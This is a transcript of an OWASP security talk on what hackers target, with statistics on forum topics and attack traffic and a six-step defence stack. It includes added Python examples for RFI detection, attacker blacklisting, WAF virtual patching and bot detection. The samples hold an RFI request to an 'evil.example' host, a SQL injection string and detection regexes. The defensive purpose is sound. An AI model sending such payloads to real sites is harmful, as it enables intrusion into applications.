What are hackers hacking
Transcript of What are hackers hacking
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Don’t Bring A Knife To A Gun Fight: The Hacker Intelligence Initiative
Robert Rachwald
Imperva
Director, Security Strategy
Agenda
The state of application security
Studying hackers
Why? Prioritizing defenses
How? Methodology
Analyzing real-life attack traffic
Key findings
Technical Recommendations
DATA IS HACKER CURRENCY
Why Data Security?
The Underground Markets
Website Access Up for Sale
THE CURRENT STATE OF WEB APPLICATION SECURITY
WhiteHat Security Top 10 - 2010
Percentage likelihood of a website having at least one vulnerability sorted by class
Situation Today
# of websites (estimated: July 2011): 357,292,065 × # of vulnerabilities: 230 × 1% = 821,771,600 vulnerabilities in active circulation
But which will be exploited?
Studying Hackers
• Focus on actual threats
– Focus on what hackers want, helping good guys prioritize
– Technical insight into hacker activity
– Business trends of hacker activity
– Future directions of hacker activity
• Eliminate uncertainties
– Active attack sources
– Explicit attack vectors
– Spam content
• Devise new defenses based on real data
– Reduce guess work
Understanding the Threat Landscape - Methodology
1. Tap into hacker forums
2. Analyze hacker tools and activity
3. Record and monitor hacker activity
PART I: HACKER FORUMS
What are Hackers Hacking?
General Topics: Hacker Forum Analysis
(Pie chart, dates 2007-2011. Slice labels recovered: Beginner Hacking, Hacking Tutorials, Website and Forum Hacking, Hacking Tools and Programs, Proxies and Socks, Electronic and Gadgets, Cryptography. Slice values recovered: 25%, 22%, 21%, 8%, 6%, 5%, 3%, 3%, 3%, 2%, 2%. The mapping of values to labels is not recoverable from the transcript.)
Top 7 Attack Techniques: Hacker Forum Analysis
(Pie chart, dates July 2010 - July 2011. Techniques: spam (9%), dos/ddos, SQL Injection, zero-day, shell code, brute-force, HTML Injection. Remaining slice values recovered: 22%, 19%, 16%, 12%, 12%, 10%; their mapping to techniques is not recoverable from the transcript.)
Growth of Discussion Topics by Year
(Bar chart, dates 2007 - July 2010. X-axis: years 2007, 2008, 2009, 2010; y-axis: 0 to 1600. Bar heights are not recoverable from the transcript.)
Mobile (in)Security
Popularity of Mobile Platform (# Threads): 12 months vs. more than a year ago
(Bar chart, dates July 2010 - July 2011. Platforms: iPhone, Android, Blackberry, Nokia; y-axis: # threads, 0 to 1600; two series: "12 months" and "More than a year ago". Bar heights are not recoverable from the transcript.)
Qualitative Analysis
PART II: ATTACK TECHNOLOGIES
What are Hackers Hacking?
Example: SQL Injection Attack Tools
Havij
SQLMap
Attacks from Automated Tools
Low Orbit Ion Cannon
DDoS 2.0
1 Compromised Server = 3000 PC- Based Bots
PART III: MONITORING TRAFFIC
What are Hackers Hacking?
Lesson #1: Automation is Prevailing
On average: 27 probes per hour (≈ 2 probes per minute)
Apps under automated attack: 25,000 attacks per hour (≈ 7 per second)
• Example: Google Dorks Campaign
80,000
Lesson #2: The Unfab Four
Lesson #2A: The Unfab Four, SQL Injection
Lesson #2B: The Unfab Four, RFI
Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.
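As an added illustration of that point (example code written for this transcript, not code from the presentation or from Imperva), the Python below treats a request parameter whose value is an absolute URL to a host outside an allowlist as an RFI attempt and tallies attempts both by attacking client and by the remote host that serves the included file. The allowlist, the sample requests and every address in them are constructed assumptions.

```python
"""Parameter and source analysis for remote file inclusion (RFI) attempts.

Added example, not code from the presentation or from Imperva. The allowlist,
the sample requests and all addresses are constructed for illustration.
"""
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Hosts the application legitimately references in URL-valued parameters.
# Assumption: constructed allowlist; a real one comes from the app's own config.
ALLOWED_REMOTE_HOSTS = {"cdn.example.com"}

# URL schemes an include directive would fetch from.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def rfi_parameters(path_and_query):
    """Return (parameter, remote host) for each parameter whose value is an
    absolute URL to a host outside the allowlist.

    A plain signature on 'http://' in the query string would also fire on the
    allowlisted CDN parameter; looking at which host the value points to is
    the extra parameter analysis that removes that noise."""
    query = urlsplit(path_and_query).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        target = urlsplit(value.strip())
        host = (target.hostname or "").lower()
        if target.scheme.lower() in REMOTE_SCHEMES and host and host not in ALLOWED_REMOTE_HOSTS:
            hits.append((name, host))
    return hits


# Constructed sample traffic: (client address, request target).
SAMPLE_REQUESTS = [
    ("203.0.113.7", "/index.php?page=http://203.0.113.99/inc.txt?"),
    ("203.0.113.7", "/index.php?page=http://203.0.113.99/inc.txt?"),
    ("198.51.100.4", "/view.php?template=https://evil.example/c.php"),
    ("192.0.2.10", "/index.php?page=about"),
    ("192.0.2.11", "/assets?src=http://cdn.example.com/logo.png"),
]


def analyse(requests):
    """Tally RFI attempts by attacking client and by the remote host that
    serves the included file. Both are the 'source' side of the attack and
    both are candidates for blocking or for a reputation feed."""
    by_client = Counter()
    by_remote_host = Counter()
    for client, target in requests:
        hits = rfi_parameters(target)
        if hits:
            by_client[client] += 1
            for _param, host in hits:
                by_remote_host[host] += 1
    return by_client, by_remote_host


if __name__ == "__main__":
    clients, hosts = analyse(SAMPLE_REQUESTS)
    print("RFI attempts by client:", dict(clients))
    print("hosts serving included files:", dict(hosts))
```

Counting the remote hosts as well as the clients matters because a campaign often rotates attacking clients while reusing the location of the included file; both counts can feed the blacklist described in the mitigation steps later in the deck.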
Lesson #2C: The Unfab Four, Directory Traversal
Lesson #2D: The Unfab Four, XSS
Lesson #2D: The Unfab Four, XSS: Zooming into Search Engine Poisoning
http://HighRankingWebSite+PopularKeywords+XSS
… http://HighRankingWebSite+PopularKeywords+XSS
New Search Engine Indexing Cycle
LulzSec Activity Samples
Lesson #3: Repeating Offenders
The average number of attacks a single host initiated:
RFI: 10
SQL Injection: 40
Directory Traversal: 25
Attacks from…: 29% from 10 sources
MITIGATION
Step 1: Dork Yourself (for SQL injection)
Put detection policies in place (using the data source monitoring solution) to detect movement of sensitive data to public-facing servers.
Regularly schedule “clean ups”. Every once in a while, a clean-up should be scheduled in order to verify that no sensitive data resides in these publicly accessible servers.
Periodically look for new data stores that hold sensitive data. Tools exist today to assist in the task of detecting database servers in the network and classifying their contents.
Step 2: Create and deploy a blacklist of hosts that initiated attacks
Blacklisting of: compromised servers, botnet Command and Control (C&C) servers, infected devices, active spam sources, crawlers to acquire intelligence on malicious sources and apply it in real time
Participate in a security community and share data on attacks
Some of the attacks’ scanning is horizontal across similar applications on the internet.
Sort traffic based on reputation
Whitelisting of: legitimate search engine bots, aggregators
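Lesson #3 and Step 2 together describe counting attacks per source and turning repeat offenders into a blacklist while keeping legitimate crawlers off it. The Python below is an added example (not code from the presentation or from Imperva) that computes the per-class average number of attacks per host, the share of attacks coming from the N busiest sources, and a blacklist that excludes whitelisted crawlers. The events, addresses and the whitelist are constructed; a real whitelist would come from verifying search-engine bots by reverse DNS.

```python
"""Repeat-offender statistics and a reputation blacklist built from them.

Added example, not code from the presentation or from Imperva. Events and
addresses are constructed; the crawler whitelist stands in for the verified
search-engine bot list a real deployment would use.
"""
from collections import Counter, defaultdict

# Assumption: constructed set of verified legitimate crawler addresses.
WHITELIST = {"192.0.2.200"}

# Constructed attack events as a detector would emit them: (source, class).
EVENTS = (
    [("203.0.113.7", "SQL Injection")] * 5
    + [("203.0.113.8", "SQL Injection")] * 3
    + [("198.51.100.4", "RFI")] * 2
    + [("192.0.2.200", "Directory Traversal")] * 3  # noisy signature on a crawler
    + [("198.51.100.5", "Directory Traversal")]
)


def attacks_per_host(events):
    """Average number of attacks a single host initiated, per attack class
    (the figure reported in Lesson #3)."""
    per_class = defaultdict(Counter)
    for source, attack_class in events:
        per_class[attack_class][source] += 1
    return {cls: sum(c.values()) / len(c) for cls, c in per_class.items()}


def top_source_share(events, n=10):
    """Fraction of all attacks that the n busiest sources account for."""
    counts = Counter(source for source, _ in events)
    top = sum(count for _, count in counts.most_common(n))
    return top / len(events)


def blacklist(events, min_attacks=3):
    """Sources that keep attacking, minus whitelisted crawlers. The whitelist
    check is applied last so a noisy signature can never block a search engine."""
    counts = Counter(source for source, _ in events)
    return sorted(
        source for source, count in counts.items()
        if count >= min_attacks and source not in WHITELIST
    )


if __name__ == "__main__":
    print(attacks_per_host(EVENTS))
    print(f"{top_source_share(EVENTS, n=2):.0%} of attacks from 2 sources")
    print("blacklist:", blacklist(EVENTS))
```

The share figure is what justifies the blacklist: when a handful of sources produce a large fraction of the attacks, blocking them by reputation removes that fraction before any signature has to be evaluated. Sharing the resulting list with a security community, as the slide suggests, is what lets horizontal scans across similar applications be recognised at the second site from the first site's data.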
Step 3: Use a WAF to detect/block attacks
Can block many attacks
Relatively easy
Can accelerate SDLC
Not all WAFs created equal
WAFs in Reality
Step 4: WAF + Vulnerability Scanner
“Security No-Brainer #9: Application Vulnerability Scanners Should Communicate with Application Firewalls” —Neil MacDonald, Gartner
Source: http://blogs.gartner.com/neil_macdonald/2009/08/19/security-no-brainer-9-application-vulnerability-scanners-should-communicate-with-application-firewalls/
Step 4: WAF + Vulnerability Scanner
Virtual Patching through Scanner Integration (customer site): Scanner finds vulnerabilities → SecureSphere imports scan results → Monitor and protect Web applications
Apply SecureSphere policies based on scan results
Monitor attempts to exploit known vulnerabilities
Fix and test vulnerabilities on your schedule
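The virtual-patching cycle on this slide (scanner finds a vulnerability, the WAF imports the result and blocks exploit attempts against that exact entry point, the attempts are monitored, and the rule is retired once the code fix is confirmed) as an added Python example. This is not SecureSphere code; the scanner export format, the finding ids, the paths and the detection patterns are constructed assumptions.

```python
"""Virtual patching: turn scanner findings into narrow WAF rules, monitor
exploit attempts against them, and retire each rule once the code fix is
confirmed by a re-scan.

Added example, not SecureSphere code or any scanner's real export format.
The JSON layout, finding ids, paths and patterns are constructed.
"""
import json
import re
from collections import Counter

# Constructed scanner export. Each finding names one vulnerable entry point.
SCAN_RESULTS = json.dumps({
    "findings": [
        {"id": "F-1", "path": "/product", "param": "id", "class": "sqli"},
        {"id": "F-2", "path": "/search", "param": "q", "class": "xss"},
        {"id": "F-3", "path": "/download", "param": "file", "class": "traversal"},
    ]
})

# Per-class patterns for the virtual patch. They are illustrative and kept
# narrow on purpose: each guards one known-vulnerable parameter, which is what
# lets a virtual patch be stricter than a generic signature without breaking
# the rest of the application.
PATTERNS = {
    "sqli": re.compile(r"'|--|;|\b(union|select)\b", re.IGNORECASE),
    "xss": re.compile(r"[<>]|javascript:", re.IGNORECASE),
    "traversal": re.compile(r"\.\./|\.\.\\|%2e%2e", re.IGNORECASE),
}


def import_scan(scan_json):
    """Map each (path, parameter) the scanner flagged to (finding id, pattern)."""
    rules = {}
    for finding in json.loads(scan_json)["findings"]:
        rules[(finding["path"], finding["param"])] = (finding["id"], PATTERNS[finding["class"]])
    return rules


class VirtualPatcher:
    def __init__(self, rules):
        self.rules = rules
        self.attempts = Counter()  # exploit attempts observed per finding id

    def evaluate(self, path, params):
        """Return ('block', finding id) when a patched parameter carries a
        value matching its pattern, otherwise ('allow', None)."""
        for name, value in params.items():
            rule = self.rules.get((path, name))
            if rule is not None and rule[1].search(value):
                self.attempts[rule[0]] += 1
                return "block", rule[0]
        return "allow", None

    def retire(self, finding_id):
        """Drop the virtual patch once a re-scan confirms the code fix."""
        self.rules = {k: v for k, v in self.rules.items() if v[0] != finding_id}


if __name__ == "__main__":
    waf = VirtualPatcher(import_scan(SCAN_RESULTS))
    print(waf.evaluate("/product", {"id": "42"}))
    print(waf.evaluate("/product", {"id": "42' OR 1=1--"}))
    print("attempts per finding:", dict(waf.attempts))
```

Two design points are worth noticing. The rules key on (path, parameter), so a payload sent to an entry point the scanner did not flag is not blocked by the virtual patch; that is the intended scope (the generic WAF signatures from Step 3 still apply there) and the reason the scanner and the WAF have to communicate. And the attempt counter is the monitoring the slide asks for: it tells you which of the known vulnerabilities are actually being probed, which is useful input when fixing "on your schedule".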
Step 5: Stop Automated Attacks
Detecting protocol anomalies even if they are not considered malicious
Slowing down an attack is most often the best way to make it ineffective (e.g. CAPTCHA, computational challenges)
Feed the client with bogus information (e.g. hidden links)
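The three controls on this slide (protocol anomaly checks, slowing fast clients down with a challenge, and a hidden link that only scripts and crawlers follow) as an added Python example that is not code from the presentation or from Imperva. The honeypot path, the thresholds, the request format and the sample traffic are constructed assumptions.

```python
"""Three controls against automated clients: protocol anomaly checks,
rate-based slow-down (challenge) and a hidden honeypot link that only
scripts and crawlers follow.

Added example, not code from the presentation or from Imperva. The honeypot
path, thresholds, request format and sample traffic are constructed.
"""
from collections import defaultdict, deque

# Assumption: a link to this path is placed in the page invisibly to humans
# (for example inside a hidden element); a browser user never requests it.
HONEYPOT_PATH = "/.trap-do-not-follow"
RATE_LIMIT = 30        # requests per window before the client is challenged
WINDOW_SECONDS = 60


def make_request(client, time, path="/", user_agent="Mozilla/5.0",
                 host="www.example.com", method="GET", version="HTTP/1.1"):
    """Build a minimal request record (constructed format for the example)."""
    headers = {}
    if user_agent is not None:
        headers["User-Agent"] = user_agent
    if host is not None:
        headers["Host"] = host
    return {"client": client, "time": time, "path": path, "method": method,
            "version": version, "headers": headers}


class AutomationDetector:
    def __init__(self, rate_limit=RATE_LIMIT, window=WINDOW_SECONDS):
        self.rate_limit = rate_limit
        self.window = window
        self.history = defaultdict(deque)  # client -> request times in window
        self.trapped = set()               # clients that followed the hidden link

    @staticmethod
    def protocol_anomalies(request):
        """Deviations that are not attacks by themselves but that real
        browsers do not produce."""
        headers = {k.lower() for k in request["headers"]}
        issues = []
        if request["version"] == "HTTP/1.1" and "host" not in headers:
            issues.append("missing-host")
        if "user-agent" not in headers:
            issues.append("missing-user-agent")
        if request["method"] not in ("GET", "POST", "HEAD"):
            issues.append("unusual-method")
        return issues

    def decide(self, request):
        """'block' trapped clients; 'challenge' anomalous or fast ones (a
        CAPTCHA or computational challenge slows them down); else 'allow'."""
        client = request["client"]
        if request["path"] == HONEYPOT_PATH:
            self.trapped.add(client)
        if client in self.trapped:
            return "block"
        times = self.history[client]
        times.append(request["time"])
        while times[0] <= request["time"] - self.window:   # drop old entries
            times.popleft()
        if self.protocol_anomalies(request):
            return "challenge"
        if len(times) > self.rate_limit:
            return "challenge"
        return "allow"


# Constructed traffic: a person, a headerless script, a fast scanner, and a
# crawler that follows the hidden link.
SAMPLE_TRAFFIC = (
    [make_request("192.0.2.10", t) for t in range(0, 50, 10)]
    + [make_request("198.51.100.4", 0, user_agent=None)]
    + [make_request("203.0.113.7", t) for t in range(31)]
    + [make_request("203.0.113.8", 0),
       make_request("203.0.113.8", 1, path=HONEYPOT_PATH),
       make_request("203.0.113.8", 2)]
)


def simulate(traffic):
    """Run one detector over a request sequence; returns (client, decision) pairs."""
    detector = AutomationDetector()
    return [(r["client"], detector.decide(r)) for r in traffic]


if __name__ == "__main__":
    for client, decision in simulate(SAMPLE_TRAFFIC):
        print(client, decision)
```

Anomalies and rate lead to a challenge rather than a block because, as the slide says, slowing an automated client down is usually enough to make it ineffective, while a false positive on a real user costs only one CAPTCHA. Following the hidden link is treated as conclusive because no human-driven browser requests it.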
Step 6: Code Fixing
Positives:
Root cause fixed
Earlier is cheaper
Issues:
Expensive, time consuming.
Never-ending process.
Summary: The Anti-Hack Stack
Dork Yourself
Blacklist
WAF
WAF + VA
Code Fixing
Stop Automated Attacks
QUESTIONS?
THANK YOU!